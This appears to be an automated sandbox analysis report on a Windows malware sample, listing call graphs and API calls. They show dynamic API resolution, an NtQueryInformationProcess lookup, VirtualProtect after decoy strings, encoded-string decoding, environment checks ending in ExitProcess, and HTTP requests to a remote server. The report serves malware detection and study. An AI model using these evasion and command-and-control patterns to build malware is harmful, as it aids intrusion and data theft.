38521 98aa50 lstrcpy 38520->38521 38523 985ff7 38521->38523 38522->38523 38523->37587 38525 98aab0 lstrcpy 38524->38525 38526 9748e9 38525->38526 38727 974800 38526->38727 38528 9748f5 38529 98aa50 lstrcpy 38528->38529 38530 974927 38529->38530 38531 98aa50 lstrcpy 38530->38531 38532 974934 38531->38532 38533 98aa50 lstrcpy 38532->38533 38534 974941 38533->38534 38535 98aa50 lstrcpy 38534->38535 38536 97494e 38535->38536 38537 98aa50 lstrcpy 38536->38537 38538 97495b InternetOpenA StrCmpCA 38537->38538 38539 974994 38538->38539 38540 974f1b InternetCloseHandle 38539->38540 38733 988cf0 38539->38733 38542 974f38 38540->38542 38748 97a210 CryptStringToBinaryA 38542->38748 38543 9749b3 38741 98ac30 38543->38741 38547 9749c6 38548 98abb0 lstrcpy 38547->38548 38553 9749cf 38548->38553 38549 98ab30 2 API calls 38550 974f55 38549->38550 38551 98acc0 4 API calls 38550->38551 38554 974f6b 38551->38554 38552 974f77 codecvt 38556 98aab0 lstrcpy 38552->38556 38557 98acc0 4 API calls 38553->38557 38555 98abb0 lstrcpy 38554->38555 38555->38552 38569 974fa7 38556->38569 38558 9749f9 38557->38558 38559 98abb0 lstrcpy 38558->38559 38560 974a02 38559->38560 38561 98acc0 4 API calls 38560->38561 38562 974a21 38561->38562 38563 98abb0 lstrcpy 38562->38563 38564 974a2a 38563->38564 38565 98ac30 3 API calls 38564->38565 38566 974a48 38565->38566 38567 98abb0 lstrcpy 38566->38567 38568 974a51 38567->38568 38570 98acc0 4 API calls 38568->38570 38569->37590 38571 974a70 38570->38571 38572 98abb0 lstrcpy 38571->38572 38573 974a79 38572->38573 38574 98acc0 4 API calls 38573->38574 38575 974a98 38574->38575 38576 98abb0 lstrcpy 38575->38576 38577 974aa1 38576->38577 38578 98acc0 4 API calls 38577->38578 38579 974acd 38578->38579 38580 98ac30 3 API calls 38579->38580 38581 974ad4 38580->38581 38582 98abb0 lstrcpy 38581->38582 38583 974add 38582->38583 38584 974af3 InternetConnectA 38583->38584 38584->38540 38585 974b23 HttpOpenRequestA 38584->38585 38587 974f0e InternetCloseHandle 38585->38587 38588 974b78 38585->38588 38587->38540 38589 98acc0 4 API calls 38588->38589 38590 974b8c 38589->38590 38591 98abb0 lstrcpy 38590->38591 38592 974b95 38591->38592 38593 98ac30 3 API calls 38592->38593 38594 974bb3 38593->38594 38595 98abb0 lstrcpy 38594->38595 38596 974bbc 38595->38596 38597 98acc0 4 API calls 38596->38597 38598 974bdb 38597->38598 38599 98abb0 lstrcpy 38598->38599 38600 974be4 38599->38600 38601 98acc0 4 API calls 38600->38601 38602 974c05 38601->38602 38603 98abb0 lstrcpy 38602->38603 38604 974c0e 38603->38604 38605 98acc0 4 API calls 38604->38605 38606 974c2e 38605->38606 38607 98abb0 lstrcpy 38606->38607 38608 974c37 38607->38608 38609 98acc0 4 API calls 38608->38609 38610 974c56 38609->38610 38611 98abb0 lstrcpy 38610->38611 38612 974c5f 38611->38612 38613 98ac30 3 API calls 38612->38613 38614 974c7d 38613->38614 38615 98abb0 lstrcpy 38614->38615 38616 974c86 38615->38616 38617 98acc0 4 API calls 38616->38617 38618 974ca5 38617->38618 38619 98abb0 lstrcpy 38618->38619 38620 974cae 38619->38620 38621 98acc0 4 API calls 38620->38621 38622 974ccd 38621->38622 38623 98abb0 lstrcpy 38622->38623 38624 974cd6 38623->38624 38625 98ac30 3 API calls 38624->38625 38626 974cf4 38625->38626 38627 98abb0 lstrcpy 38626->38627 38628 974cfd 38627->38628 38629 98acc0 4 API calls 38628->38629 38630 974d1c 38629->38630 38631 98abb0 lstrcpy 38630->38631 38632 974d25 38631->38632 38633 98acc0 4 API calls 38632->38633 38634 974d46 38633->38634 38635 98abb0 lstrcpy 38634->38635 38636 974d4f 38635->38636 38637 98acc0 4 API calls 38636->38637 38638 974d6f 38637->38638 38639 98abb0 lstrcpy 38638->38639 38640 974d78 38639->38640 38641 98acc0 4 API calls 38640->38641 38642 974d97 38641->38642 38643 98abb0 lstrcpy 38642->38643 38644 974da0 38643->38644 38645 98ac30 3 API calls 38644->38645 38646 974dbe 38645->38646 38647 98abb0 lstrcpy 38646->38647 38648 974dc7 38647->38648 38649 98aa50 lstrcpy 38648->38649 38650 974de2 38649->38650 38651 98ac30 3 API calls 38650->38651 38652 974e03 38651->38652 38653 98ac30 3 API calls 38652->38653 38654 974e0a 38653->38654 38655 98abb0 lstrcpy 38654->38655 38656 974e16 38655->38656 38657 974e37 lstrlen 38656->38657 38658 974e4a 38657->38658 38659 974e53 lstrlen 38658->38659 38747 98ade0 38659->38747 38661 974e63 HttpSendRequestA 38662 974e82 InternetReadFile 38661->38662 38663 974eb7 InternetCloseHandle 38662->38663 38668 974eae 38662->38668 38666 98ab10 38663->38666 38665 98acc0 4 API calls 38665->38668 38666->38587 38667 98abb0 lstrcpy 38667->38668 38668->38662 38668->38663 38668->38665 38668->38667 38754 98ade0 38669->38754 38671 981a14 StrCmpCA 38672 981a1f ExitProcess 38671->38672 38674 981a27 38671->38674 38673 981c12 38673->37592 38674->38673 38675 981afd StrCmpCA 38674->38675 38676 981b1f StrCmpCA 38674->38676 38677 981aad StrCmpCA 38674->38677 38678 981acf StrCmpCA 38674->38678 38679 981bc0 StrCmpCA 38674->38679 38680 981b41 StrCmpCA 38674->38680 38681 981ba1 StrCmpCA 38674->38681 38682 981b82 StrCmpCA 38674->38682 38683 981b63 StrCmpCA 38674->38683 38684 98ab30 lstrlen lstrcpy 38674->38684 38675->38674 38676->38674 38677->38674 38678->38674 38679->38674 38680->38674 38681->38674 38682->38674 38683->38674 38684->38674 38685->37598 38686->37600 38687->37606 38688->37608 38689->37614 38690->37616 38691->37620 38692->37624 38693->37628 38694->37634 38695->37636 38696->37640 38697->37654 38698->37658 38699->37657 38700->37653 38701->37657 38702->37675 38703->37660 38704->37662 38705->37666 38706->37671 38707->37672 38708->37679 38709->37682 38710->37688 38711->37710 38712->37715 38713->37714 38714->37711 38715->37714 38716->37724 38719 98aab0 lstrcpy 38718->38719 38720 9716c3 38719->38720 38721 98aab0 lstrcpy 38720->38721 38722 9716d5 38721->38722 38723 98aab0 lstrcpy 38722->38723 38724 9716e7 38723->38724 38725 98aab0 lstrcpy 38724->38725 38726 9715a3 38725->38726 38726->38451 38728 974816 38727->38728 38729 974888 lstrlen 38728->38729 38753 98ade0 38729->38753 38731 974898 InternetCrackUrlA 38732 9748b7 38731->38732 38732->38528 38734 98aa50 lstrcpy 38733->38734 38735 988d04 38734->38735 38736 98aa50 lstrcpy 38735->38736 38737 988d12 GetSystemTime 38736->38737 38738 988d29 38737->38738 38739 98aab0 lstrcpy 38738->38739 38740 988d8c 38739->38740 38740->38543 38742 98ac41 38741->38742 38743 98ac98 38742->38743 38745 98ac78 lstrcpy lstrcat 38742->38745 38744 98aab0 lstrcpy 38743->38744 38746 98aca4 38744->38746 38745->38743 38746->38547 38747->38661 38749 974f3e 38748->38749 38750 97a249 LocalAlloc 38748->38750 38749->38549 38749->38552 38750->38749 38751 97a264 CryptStringToBinaryA 38750->38751 38751->38749 38752 97a289 LocalFree 38751->38752 38752->38749 38753->38731 38754->38671

                                        Executed Functions

                                        Function 00989BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 660 989bb0-989bc4 call 989aa0 663 989bca-989dde call 989ad0 GetProcAddress * 21 660->663 664 989de3-989e42 LoadLibraryA * 5 660->664 663->664 665 989e5d-989e64 664->665 666 989e44-989e58 GetProcAddress 664->666 668 989e96-989e9d 665->668 669 989e66-989e91 GetProcAddress * 2 665->669 666->665 671 989eb8-989ebf 668->671 672 989e9f-989eb3 GetProcAddress 668->672 669->668 673 989ed9-989ee0 671->673 674 989ec1-989ed4 GetProcAddress 671->674 672->671 675 989f11-989f12 673->675 676 989ee2-989f0c GetProcAddress * 2 673->676 674->673 676->675
                                        APIs
                                        • GetProcAddress.KERNEL32(76210000,01811578), ref: 00989BF1
                                        • GetProcAddress.KERNEL32(76210000,018115D8), ref: 00989C0A
                                        • GetProcAddress.KERNEL32(76210000,018115A8), ref: 00989C22
                                        • GetProcAddress.KERNEL32(76210000,01811710), ref: 00989C3A
                                        • GetProcAddress.KERNEL32(76210000,018115C0), ref: 00989C53
                                        • GetProcAddress.KERNEL32(76210000,01818938), ref: 00989C6B
                                        • GetProcAddress.KERNEL32(76210000,01805628), ref: 00989C83
                                        • GetProcAddress.KERNEL32(76210000,018054C8), ref: 00989C9C
                                        • GetProcAddress.KERNEL32(76210000,01811638), ref: 00989CB4
                                        • GetProcAddress.KERNEL32(76210000,01811608), ref: 00989CCC
                                        • GetProcAddress.KERNEL32(76210000,01811740), ref: 00989CE5
                                        • GetProcAddress.KERNEL32(76210000,01811650), ref: 00989CFD
                                        • GetProcAddress.KERNEL32(76210000,018056A8), ref: 00989D15
                                        • GetProcAddress.KERNEL32(76210000,01811758), ref: 00989D2E
                                        • GetProcAddress.KERNEL32(76210000,01811770), ref: 00989D46
                                        • GetProcAddress.KERNEL32(76210000,018056C8), ref: 00989D5E
                                        • GetProcAddress.KERNEL32(76210000,01811668), ref: 00989D77
                                        • GetProcAddress.KERNEL32(76210000,01811680), ref: 00989D8F
                                        • GetProcAddress.KERNEL32(76210000,018054A8), ref: 00989DA7
                                        • GetProcAddress.KERNEL32(76210000,01811890), ref: 00989DC0
                                        • GetProcAddress.KERNEL32(76210000,01805368), ref: 00989DD8
                                        • LoadLibraryA.KERNEL32(01811878,?,00986CA0), ref: 00989DEA
                                        • LoadLibraryA.KERNEL32(018118A8,?,00986CA0), ref: 00989DFB
                                        • LoadLibraryA.KERNEL32(018117E8,?,00986CA0), ref: 00989E0D
                                        • LoadLibraryA.KERNEL32(01811860,?,00986CA0), ref: 00989E1F
                                        • LoadLibraryA.KERNEL32(01811800,?,00986CA0), ref: 00989E30
                                        • GetProcAddress.KERNEL32(75B30000,01811818), ref: 00989E52
                                        • GetProcAddress.KERNEL32(751E0000,01811830), ref: 00989E73
                                        • GetProcAddress.KERNEL32(751E0000,01811848), ref: 00989E8B
                                        • GetProcAddress.KERNEL32(76910000,01818F50), ref: 00989EAD
                                        • GetProcAddress.KERNEL32(75670000,01805408), ref: 00989ECE
                                        • GetProcAddress.KERNEL32(77310000,01818978), ref: 00989EEF
                                        • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00989F06
                                        Strings
                                        • NtQueryInformationProcess, xrefs: 00989EFA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: NtQueryInformationProcess
                                        • API String ID: 2238633743-2781105232
                                        • Opcode ID: 452f2c57451ad78f6be7ef482fb2387e01eacaf5d7f9ed410dbcba912301e05d
                                        • Instruction ID: bfc293788cb41d0526da1a3b1ea43ff54ddd2e5729e2adf27af2bf286fc154e6
                                        • Opcode Fuzzy Hash: 452f2c57451ad78f6be7ef482fb2387e01eacaf5d7f9ed410dbcba912301e05d
                                        • Instruction Fuzzy Hash: 08A109BD608241DFC354DFA8EC88B5E7BA9B78F702710871AB90AC3274D7749944DBA1
                                        Function 00974610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 764 974610-9746e5 RtlAllocateHeap 781 9746f0-9746f6 764->781 782 97479f-9747f9 VirtualProtect 781->782 783 9746fc-97479a 781->783 783->781
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0097465E
                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 009747EC
                                        Strings
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009746B2
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009746A7
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0097478F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974728
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974707
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0097462D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974617
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009747C0
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974638
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0097467D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974672
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009747AA
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0097479F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974643
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009746FC
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974763
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009746C8
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0097476E
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974784
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0097471D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974693
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009747CB
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009746D3
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009747B5
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974622
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974712
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974779
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974688
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974667
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009746BD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeapProtectVirtual
                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                        • API String ID: 1542196881-2218711628
                                        • Opcode ID: c145f849ac7452495c12b001302f45dcce1dd29fbe6da974017faaa4d1338f2a
                                        • Instruction ID: ab9ada8029fa94b9cba6af864e16a46db1566e051b9877481ef3fa87fb2991a5
                                        • Opcode Fuzzy Hash: c145f849ac7452495c12b001302f45dcce1dd29fbe6da974017faaa4d1338f2a
                                        • Instruction Fuzzy Hash: D14144227D26056BCA35FBEC88FEF9E77527FC2718F429282AEA4122D0C770550046A6
                                        Function 009762D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1033 9762d0-97635b call 98aab0 call 974800 call 98aa50 InternetOpenA StrCmpCA 1040 976364-976368 1033->1040 1041 97635d 1033->1041 1042 97636e-976392 InternetConnectA 1040->1042 1043 976559-976575 call 98aab0 call 98ab10 * 2 1040->1043 1041->1040 1044 97654f-976553 InternetCloseHandle 1042->1044 1045 976398-97639c 1042->1045 1061 976578-97657d 1043->1061 1044->1043 1047 97639e-9763a8 1045->1047 1048 9763aa 1045->1048 1051 9763b4-9763e2 HttpOpenRequestA 1047->1051 1048->1051 1053 976545-976549 InternetCloseHandle 1051->1053 1054 9763e8-9763ec 1051->1054 1053->1044 1056 976415-976455 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 9763ee-97640f InternetSetOptionA 1054->1057 1059 976457-976477 call 98aa50 call 98ab10 * 2 1056->1059 1060 97647c-97649b call 988ad0 1056->1060 1057->1056 1059->1061 1067 97649d-9764a4 1060->1067 1068 976519-976539 call 98aa50 call 98ab10 * 2 1060->1068 1071 976517-97653f InternetCloseHandle 1067->1071 1072 9764a6-9764d0 InternetReadFile 1067->1072 1068->1061 1071->1053 1076 9764d2-9764d9 1072->1076 1077 9764db 1072->1077 1076->1077 1080 9764dd-976515 call 98acc0 call 98abb0 call 98ab10 1076->1080 1077->1071 1080->1072
                                        APIs
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 00974800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00974889
                                          • Part of subcall function 00974800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00974899
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        • InternetOpenA.WININET(00990DFF,00000001,00000000,00000000,00000000), ref: 00976331
                                        • StrCmpCA.SHLWAPI(?,0181FCB0), ref: 00976353
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00976385
                                        • HttpOpenRequestA.WININET(00000000,GET,?,0181F008,00000000,00000000,00400100,00000000), ref: 009763D5
                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0097640F
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00976421
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0097644D
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009764BD
                                        • InternetCloseHandle.WININET(00000000), ref: 0097653F
                                        • InternetCloseHandle.WININET(00000000), ref: 00976549
                                        • InternetCloseHandle.WININET(00000000), ref: 00976553
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                        • String ID: ERROR$ERROR$GET
                                        • API String ID: 3749127164-2509457195
                                        • Opcode ID: 72bd841b7b0a38c003cb5e0e446a24899662406fa5f60915d978650285b9ed44
                                        • Instruction ID: 30f7d2f1a7d5ed0096d2d0c041605cd1c160ea495680b071b55f5a50f09e868d
